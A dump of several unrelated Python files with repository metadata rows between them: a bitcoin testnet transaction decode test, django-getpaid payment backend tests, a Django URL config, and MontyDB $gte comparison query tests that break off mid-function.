2022-02-26T16:31:11.000Z
|
from bit.network import get_decoded_tx
TESTNET_TX = ('01000000018878399d83ec25c627cfbf753ff9ca3602373eac437ab2676154a3c2'
'da23adf3010000008a473044022068b8dce776ef1c071f4c516836cdfb358e44ef'
'58e0bf29d6776ebdc4a6b719df02204ea4a9b0f4e6afa4c229a3f11108ff66b178'
'95015afa0c26c4bbc2b3ba1a1cc60141043d5c2875c9bd116875a71a5db64cffcb'
'13396b163d039b1d932782489180433476a4352a2add00ebb0d5c94c515b72eb10'
'f1fd8f3f03b42f4a2b255bfc9aa9e3ffffffff0250c30000000000001976a914e7'
'c1345fc8f87c68170b3aa798a956c2fe6a9eff88ac0888fc04000000001976a914'
'92461bde6283b461ece7ddf4dbf1e0a48bd113d888ac00000000')
def test_get_decoded_tx():
tx = get_decoded_tx(TESTNET_TX, test=True)
assert len(tx['data']['tx']['vout']) == 2
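The assertion pins down only the output count; the decoded dict presumably follows a conventional JSON transaction layout with inputs under 'vin' and outputs under 'vout'. A hedged sketch of inspecting more of the same decode (field names beyond data.tx.vout are assumptions):

def inspect_decoded_tx():
    # Reuses the TESTNET_TX constant above; 'value' per output is an assumption.
    tx = get_decoded_tx(TESTNET_TX, test=True)
    for i, vout in enumerate(tx['data']['tx']['vout']):
        print(i, vout.get('value'))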
| 50.8125
| 82
| 0.782288
| 37
| 813
| 16.945946
| 0.648649
| 0.047847
| 0.057416
| 0.060606
| 0.066986
| 0
| 0
| 0
| 0
| 0
| 0
| 0.491176
| 0.163592
| 813
| 15
| 83
| 54.2
| 0.430882
| 0
| 0
| 0
| 0
| 0
| 0.644526
| 0.632226
| 0
| 1
| 0
| 0
| 0.083333
| 1
| 0.083333
| false
| 0
| 0.083333
| 0
| 0.166667
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8d2a355a0a722738734e20a2667887754fe58590
| 18,355
|
py
|
Python
|
getpaid/tests.py
|
fizista/django-getpaid
|
e3f1e957c0be720a5c13d2f4f6f163050bab723d
|
[
"MIT"
] | null | null | null |
getpaid/tests.py
|
fizista/django-getpaid
|
e3f1e957c0be720a5c13d2f4f6f163050bab723d
|
[
"MIT"
] | null | null | null |
getpaid/tests.py
|
fizista/django-getpaid
|
e3f1e957c0be720a5c13d2f4f6f163050bab723d
|
[
"MIT"
] | null | null | null |
"""
This file demonstrates writing tests using the unittest module. These will pass
when you run "manage.py test".
Replace this with more appropriate tests for your application.
"""
from decimal import Decimal
from django.core.urlresolvers import reverse
from django.db.models.loading import get_model
from django.test import TestCase
from django.test.client import Client
import mock
from getpaid.backends import przelewy24
import getpaid.backends.payu
import getpaid.backends.transferuj
from getpaid_test_project.orders.models import Order
class TransferujBackendTestCase(TestCase):
def test_online_not_allowed_ip(self):
self.assertEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('0.0.0.0', None, None, None, None, None,
None, None, None, None, None, None))
#Tests allowing IP given in settings
with self.settings(GETPAID_BACKENDS_SETTINGS={
'getpaid.backends.transferuj': {'allowed_ip': ('1.1.1.1', '1.2.3.4'), 'key': ''},
}):
self.assertEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('0.0.0.0', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('1.1.1.1', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('1.2.3.4', None, None, None, None,
None, None, None, None, None, None,
None))
#Tests allowing all IP
with self.settings(GETPAID_BACKENDS_SETTINGS={
'getpaid.backends.transferuj': {'allowed_ip': [], 'key': ''},
}):
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('0.0.0.0', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('1.1.1.1', None, None, None, None,
None, None, None, None, None, None,
None))
self.assertNotEqual('IP ERR',
getpaid.backends.transferuj.PaymentProcessor.online('1.2.3.4', None, None, None, None,
None, None, None, None, None, None,
None))
def test_online_wrong_sig(self):
self.assertEqual('SIG ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'xxx'))
self.assertNotEqual('SIG ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'21b028c2dbdcb9ca272d1cc67ed0574e'))
def test_online_wrong_id(self):
self.assertEqual('ID ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1111', '1', '', '1',
'123.45', None, None, None, None, None,
'15bb75707d4374bc6e578c0cbf5a7fc7'))
self.assertNotEqual('ID ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '', '1',
'123.45', None, None, None, None, None,
'f5f8276fbaa98a6e05b1056ab7c3a589'))
def test_online_crc_error(self):
self.assertEqual('CRC ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
'99999', '123.45', None, None, None, None,
None, 'f5f8276fbaa98a6e05b1056ab7c3a589'))
self.assertEqual('CRC ERR',
getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
'GRRGRRG', '123.45', None, None, None,
None, None,
'6a9e045010c27dfed24774b0afa37d0b'))
def test_online_payment_ok(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '123.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('123.45'))
def test_online_payment_ok_over(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '223.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('223.45'))
def test_online_payment_partial(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '23.45', '',
'TRUE', 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'partially_paid')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('23.45'))
def test_online_payment_failure(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
self.assertEqual('TRUE', getpaid.backends.transferuj.PaymentProcessor.online('195.149.229.109', '1234', '1', '',
payment.pk, '123.45', '23.45', '',
False, 0, '',
'21b028c2dbdcb9ca272d1cc67ed0574e'))
payment = Payment.objects.get(pk=payment.pk)
self.assertEqual(payment.status, 'failed')
def fake_payment_get_response_success(request):
class fake_response:
def read(self):
return """<?xml version="1.0" encoding="UTF-8"?>
<response>
<status>OK</status>
<trans>
<id>234748067</id>
<pos_id>123456789</pos_id>
<session_id>99:1342616247.41</session_id>
<order_id>99</order_id>
<amount>12345</amount>
<status>99</status>
<pay_type>t</pay_type>
<pay_gw_name>pt</pay_gw_name>
<desc>Test 2</desc>
<desc2></desc2>
<create>2012-07-18 14:57:28</create>
<init></init>
<sent></sent>
<recv></recv>
<cancel>2012-07-18 14:57:30</cancel>
<auth_fraud>0</auth_fraud>
<ts>1342616255805</ts>
<sig>4d4df5557b89a4e2d8c48436b1dd3fef</sig> </trans>
</response>"""
return fake_response()
def fake_payment_get_response_failure(request):
class fake_response:
def read(self):
return """<?xml version="1.0" encoding="UTF-8"?>
<response>
<status>OK</status>
<trans>
<id>234748067</id>
<pos_id>123456789</pos_id>
<session_id>98:1342616247.41</session_id>
<order_id>98</order_id>
<amount>12345</amount>
<status>2</status>
<pay_type>t</pay_type>
<pay_gw_name>pt</pay_gw_name>
<desc>Test 2</desc>
<desc2></desc2>
<create>2012-07-18 14:57:28</create>
<init></init>
<sent></sent>
<recv></recv>
<cancel>2012-07-18 14:57:30</cancel>
<auth_fraud>0</auth_fraud>
<ts>1342616255805</ts>
<sig>ee77e9515599e3fd2b3721dff50111dd</sig> </trans>
</response>"""
return fake_response()
class PayUBackendTestCase(TestCase):
def setUp(self):
self.client = Client()
def test_online_malformed(self):
response = self.client.post(reverse('getpaid-payu-online'), {})
self.assertEqual(response.content, 'MALFORMED')
def test_online_sig_err(self):
response = self.client.post(reverse('getpaid-payu-online'), {
'pos_id' : 'wrong',
'session_id': '10:11111',
'ts' : '1111',
'sig' : 'wrong sig',
})
self.assertEqual(response.content, 'SIG ERR')
def test_online_wrong_pos_id_err(self):
response = self.client.post(reverse('getpaid-payu-online'), {
'pos_id' : '12345',
'session_id': '10:11111',
'ts' : '1111',
'sig' : '0d6129738c0aee9d4eb56f2a1db75ab4',
})
self.assertEqual(response.content, 'POS_ID ERR')
def test_online_wrong_session_id_err(self):
response = self.client.post(reverse('getpaid-payu-online'), {
'pos_id' : '123456789',
'session_id': '111111',
'ts' : '1111',
'sig' : 'fcf3db081d5085b45fe86ed0c6a9aa5e',
})
self.assertEqual(response.content, 'SESSION_ID ERR')
def test_online_ok(self):
response = self.client.post(reverse('getpaid-payu-online'), {
'pos_id' : '123456789',
'session_id': '1:11111',
'ts' : '1111',
'sig' : '2a78322c06522613cbd7447983570188',
})
self.assertEqual(response.content, 'OK')
@mock.patch("urllib2.urlopen", fake_payment_get_response_success)
def test_payment_get_paid(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=99, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=99) # re-fetch to work around Django bug https://code.djangoproject.com/ticket/5903
processor = getpaid.backends.payu.PaymentProcessor(payment)
processor.get_payment_status('99:1342616247.41')
self.assertEqual(payment.status, 'paid')
self.assertNotEqual(payment.paid_on, None)
self.assertNotEqual(payment.amount_paid, Decimal('0'))
@mock.patch("urllib2.urlopen", fake_payment_get_response_failure)
def test_payment_get_failed(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test EUR order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=98, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.payu')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=98) # re-fetch to work around Django bug https://code.djangoproject.com/ticket/5903
processor = getpaid.backends.payu.PaymentProcessor(payment)
processor.get_payment_status('98:1342616247.41')
self.assertEqual(payment.status, 'failed')
self.assertEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('0'))
def fake_przelewy24_payment_get_response_success(request):
class fake_response:
def read(self):
return """RESULT
TRUE"""
return fake_response()
def fake_przelewy24_payment_get_response_failed(request):
class fake_response:
def read(self):
return """RESULT
ERR
123
Some error description"""
return fake_response()
class Przelewy24PaymentProcessorTestCase(TestCase):
def test_sig(self):
# Test based on p24 documentation
sig = przelewy24.PaymentProcessor.compute_sig({
'key1' : '9999',
'key2' : '2500',
'key3' : 'ccc',
'key4' : 'abcdefghijk',
'crc' : 'a123b456c789d012',
}, ('key4', 'key1', 'key2', 'crc'), 'a123b456c789d012')
self.assertEqual(sig, 'e2c43dec9578633c518e1f514d3b434b')
@mock.patch("urllib2.urlopen", fake_przelewy24_payment_get_response_success)
def test_get_payment_status_success(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=191, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.przelewy24')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=191)
processor = getpaid.backends.przelewy24.PaymentProcessor(payment)
processor.get_payment_status(p24_session_id='191:xxx:xxx', p24_order_id='191:external', p24_kwota='12345')
self.assertEqual(payment.status, 'paid')
self.assertEqual(payment.external_id, '191:external')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('123.45'))
@mock.patch("urllib2.urlopen", fake_przelewy24_payment_get_response_success)
def test_get_payment_status_success_partial(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=192, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.przelewy24')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=192)
processor = getpaid.backends.przelewy24.PaymentProcessor(payment)
processor.get_payment_status(p24_session_id='192:xxx:xxx', p24_order_id='192:external', p24_kwota='12245')
self.assertEqual(payment.status, 'partially_paid')
self.assertEqual(payment.external_id, '192:external')
self.assertNotEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('122.45'))
@mock.patch("urllib2.urlopen", fake_przelewy24_payment_get_response_failed)
def test_get_payment_status_failed(self):
Payment = get_model('getpaid', 'Payment')
order = Order(name='Test PLN order', total='123.45', currency='PLN')
order.save()
payment = Payment(pk=192, order=order, amount=order.total, currency=order.currency, backend='getpaid.backends.przelewy24')
payment.save(force_insert=True)
payment = Payment.objects.get(pk=192)
processor = getpaid.backends.przelewy24.PaymentProcessor(payment)
processor.get_payment_status(p24_session_id='192:xxx:xxx', p24_order_id='192:external', p24_kwota='12245')
self.assertEqual(payment.status, 'failed')
self.assertEqual(payment.paid_on, None)
self.assertEqual(payment.amount_paid, Decimal('0.0'))
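test_sig fixes compute_sig's contract: it selects the listed parameters in order and hashes them together with the CRC. A re-implementation sketch consistent with that test; md5 over the concatenated values is an assumption inferred from the 32-hex-digit expected digest, not copied from the backend source:

import hashlib

def compute_sig_sketch(params, keys, crc):
    # Hypothetical equivalent of przelewy24.PaymentProcessor.compute_sig;
    # a key absent from params falls back to the crc argument.
    values = [str(params.get(key, crc)) for key in keys]
    return hashlib.md5("".join(values).encode("utf-8")).hexdigest()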
| 49.07754
| 130
| 0.542359
| 1,805
| 18,355
| 5.39169
| 0.118006
| 0.077271
| 0.099877
| 0.111796
| 0.820078
| 0.790896
| 0.752055
| 0.741677
| 0.723284
| 0.708076
| 0
| 0.088697
| 0.337238
| 18,355
| 373
| 131
| 49.209115
| 0.711303
| 0.022501
| 0
| 0.63871
| 0
| 0
| 0.196944
| 0.066094
| 0
| 0
| 0
| 0
| 0.16129
| 1
| 0.090323
| false
| 0
| 0.032258
| 0.012903
| 0.170968
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
8d90da96d9ad8a53fa62e6dc5cd7e352f1cb70e5
| 467
|
py
|
Python
|
e/mail-relay/web/apps/localized_mail/urls.py
|
zhouli121018/nodejsgm
|
0ccbc8acf61badc812f684dd39253d55c99f08eb
|
[
"MIT"
] | null | null | null |
e/mail-relay/web/apps/localized_mail/urls.py
|
zhouli121018/nodejsgm
|
0ccbc8acf61badc812f684dd39253d55c99f08eb
|
[
"MIT"
] | 18
|
2020-06-05T18:17:40.000Z
|
2022-03-11T23:25:21.000Z
|
e/mail-relay/web/apps/localized_mail/urls.py
|
zhouli121018/nodejsgm
|
0ccbc8acf61badc812f684dd39253d55c99f08eb
|
[
"MIT"
] | null | null | null |
from django.conf.urls import patterns, url
urlpatterns = patterns('',
url(r'mail_list$', 'apps.localized_mail.views.mail_list', name='localized_mail_list'),
#
url(r'mail_read$', 'apps.localized_mail.views.mail_read', name='localized_mail_read'),
url(r'ajax_get_mails$', 'apps.localized_mail.views.ajax_get_mails', name='ajax_get_localized_mails'),
url(r'mail_summary$', 'apps.localized_mail.views.mail_summary', name='localized_mail_summary'),
)
| 46.7
| 105
| 0.749465
| 68
| 467
| 4.808824
| 0.294118
| 0.278287
| 0.207951
| 0.269113
| 0.238532
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092077
| 467
| 9
| 106
| 51.888889
| 0.771226
| 0
| 0
| 0
| 0
| 0
| 0.600858
| 0.416309
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
a5e0dd02e6c5e1d3a61c9296a5ce1695e174c4a2
| 21
|
py
|
Python
|
datasets/__init__.py
|
vayzenb/open_ipcl
|
c350f5114fb529a111ccd12eb10b8162bd1101c9
|
[
"MIT"
] | 7
|
2021-11-14T15:32:59.000Z
|
2022-02-15T15:34:44.000Z
|
datasets/__init__.py
|
vayzenb/open_ipcl
|
c350f5114fb529a111ccd12eb10b8162bd1101c9
|
[
"MIT"
] | null | null | null |
datasets/__init__.py
|
vayzenb/open_ipcl
|
c350f5114fb529a111ccd12eb10b8162bd1101c9
|
[
"MIT"
] | 2
|
2021-11-14T15:38:44.000Z
|
2022-01-30T11:55:46.000Z
|
from .folder import *
| 21
| 21
| 0.761905
| 3
| 21
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 21
| 1
| 21
| 21
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
a5ed324dd7e9f4317c31b2655db0a7bec6aeeac8
| 14,035
|
py
|
Python
|
tests/test_engine/test_queries/test_queryop_comparsion_gte.py
|
gitter-badger/MontyDB
|
849d03dc2cfed35739481e9acb1ff0bd8095c91b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_engine/test_queries/test_queryop_comparsion_gte.py
|
gitter-badger/MontyDB
|
849d03dc2cfed35739481e9acb1ff0bd8095c91b
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_engine/test_queries/test_queryop_comparsion_gte.py
|
gitter-badger/MontyDB
|
849d03dc2cfed35739481e9acb1ff0bd8095c91b
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from montydb.errors import OperationFailure
from datetime import datetime
from bson.timestamp import Timestamp
from bson.objectid import ObjectId
from bson.min_key import MinKey
from bson.max_key import MaxKey
from bson.int64 import Int64
from bson.decimal128 import Decimal128
from bson.binary import Binary
from bson.regex import Regex
from bson.code import Code
from bson.py3compat import PY3
def test_qop_gte_1(monty_find, mongo_find):
docs = [
{"a": 0},
{"a": 1}
]
spec = {"a": {"$gte": 0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_2(monty_find, mongo_find):
docs = [
{"a": "x"},
{"a": "y"}
]
spec = {"a": {"$gte": "x"}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_3(monty_find, mongo_find):
docs = [
{"a": 10},
{"a": "10"}
]
spec = {"a": {"$gte": 10}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_4(monty_find, mongo_find):
docs = [
{"a": True},
{"a": False}
]
spec = {"a": {"$gte": False}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_5(monty_find, mongo_find):
docs = [
{"a": 1},
{"a": False}
]
spec = {"a": {"$gte": False}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_6(monty_find, mongo_find):
docs = [
{"a": [1, 2]},
{"a": [3, 4]}
]
spec = {"a": {"$gte": [2, 3]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_7(monty_find, mongo_find):
docs = [
{"a": {"b": 4}},
{"a": {"b": 6}}
]
spec = {"a": {"$gte": {"b": 5}}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_8(monty_find, mongo_find):
docs = [
{"a": {"b": 4}},
{"a": {"e": 4}}
]
spec = {"a": {"$gte": {"c": 4}}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_9(monty_find, mongo_find):
oid_0 = ObjectId(b"000000000000")
oid_1 = ObjectId(b"000000000001")
docs = [
{"a": oid_0},
{"a": oid_1}
]
spec = {"a": {"$gte": oid_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_10(monty_find, mongo_find):
dt_0 = datetime(1900, 1, 1)
dt_1 = datetime(1900, 1, 2)
docs = [
{"a": dt_0},
{"a": dt_1}
]
spec = {"a": {"$gte": dt_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_11(monty_find, mongo_find):
ts_0 = Timestamp(0, 1)
ts_1 = Timestamp(1, 1)
docs = [
{"a": ts_0},
{"a": ts_1}
]
spec = {"a": {"$gte": ts_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_12(monty_find, mongo_find):
min_k = MinKey()
max_k = MaxKey()
docs = [
{"a": min_k},
{"a": max_k}
]
spec = {"a": {"$gte": min_k}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_13(monty_find, mongo_find):
oid_0 = ObjectId(b"000000000000")
max_k = MaxKey()
min_k = MinKey()
docs = [
{"a": oid_0},
{"a": max_k},
{"a": min_k},
{"a": 55},
]
spec = {"a": {"$gte": max_k}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_14(monty_find, mongo_find):
ts_0 = Timestamp(0, 1)
dt_1 = datetime(1900, 1, 2)
docs = [
{"a": ts_0},
{"a": dt_1}
]
spec = {"a": {"$gte": ts_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_15(monty_find, mongo_find):
docs = [
{"a": [1]},
{"a": 2}
]
spec = {"a": {"$gte": 1}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_16(monty_find, mongo_find):
docs = [
{"a": [2, 3]},
{"a": 2}
]
spec = {"a": {"$gte": 2}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_17(monty_find, mongo_find):
docs = [
{"a": [1, 3]},
{"a": 2}
]
spec = {"a": {"$gte": [1]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_18(monty_find, mongo_find):
docs = [
{"a": [1, 3]},
{"a": 2}
]
spec = {"a": {"$gte": [2]}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 0
assert monty_c.count() == mongo_c.count()
def test_qop_gte_19(monty_find, mongo_find):
docs = [
{"a": [None]},
{"a": 2}
]
spec = {"a": {"$gte": []}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_20(monty_find, mongo_find):
long_ = Int64(10)
int_ = 10
float_ = 10.0
decimal_ = Decimal128("10.0")
docs = [
{"a": long_},
{"a": int_},
{"a": float_},
{"a": decimal_}
]
spec = {"a": {"$gte": 9.5}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 4
assert monty_c.count() == mongo_c.count()
for i in range(4):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_21(monty_find, mongo_find):
docs = [
{"a": Decimal128("1.1")},
{"a": Decimal128("NaN")},
{"a": Decimal128("-NaN")},
{"a": Decimal128("sNaN")},
{"a": Decimal128("-sNaN")},
{"a": Decimal128("Infinity")}
]
spec = {"a": {"$gte": Decimal128("0")}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_22(monty_find, mongo_find):
bin_0 = Binary(b"0")
bin_1 = Binary(b"1")
byt_0 = b"0"
byt_1 = b"1"
docs = [
{"a": bin_0},
{"a": bin_1},
{"a": byt_0},
{"a": byt_1}
]
spec = {"a": {"$gte": bin_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == (4 if PY3 else 2)
assert monty_c.count() == mongo_c.count()
r = 4 if PY3 else 2
for i in range(r):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_23(monty_find, mongo_find):
bin_0 = Binary(b"0")
bin_1 = Binary(b"1")
byt_0 = b"0"
byt_1 = b"1"
docs = [
{"a": bin_0},
{"a": bin_1},
{"a": byt_0},
{"a": byt_1}
]
spec = {"a": {"$gte": byt_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == (4 if PY3 else 2)
assert monty_c.count() == mongo_c.count()
r = 4 if PY3 else 2
for i in range(r):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_24(monty_find, mongo_find):
code_0 = Code("0")
code_1 = Code("1")
docs = [
{"a": code_0},
{"a": code_1}
]
spec = {"a": {"$gte": code_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 2
assert monty_c.count() == mongo_c.count()
for i in range(2):
assert next(mongo_c) == next(monty_c)
def test_qop_gte_25(monty_find, mongo_find):
code_0 = Code("0")
code_1 = Code("1")
code_1s = Code("1", {})
docs = [
{"a": code_1},
{"a": code_1s}
]
spec = {"a": {"$gte": code_0}}
monty_c = monty_find(docs, spec)
mongo_c = mongo_find(docs, spec)
assert mongo_c.count() == 1
assert monty_c.count() == mongo_c.count()
assert next(mongo_c) == next(monty_c)
def test_qop_gte_26(monty_find, mongo_find):
code_0s = Code("0", {})
code_1s = Code("1", {})
docs = [
{"a": code_0s},
{"a": code_1s}
]
spec = {"a": {"$gte": code_0s}}
monty_c = monty_find(docs, spec)
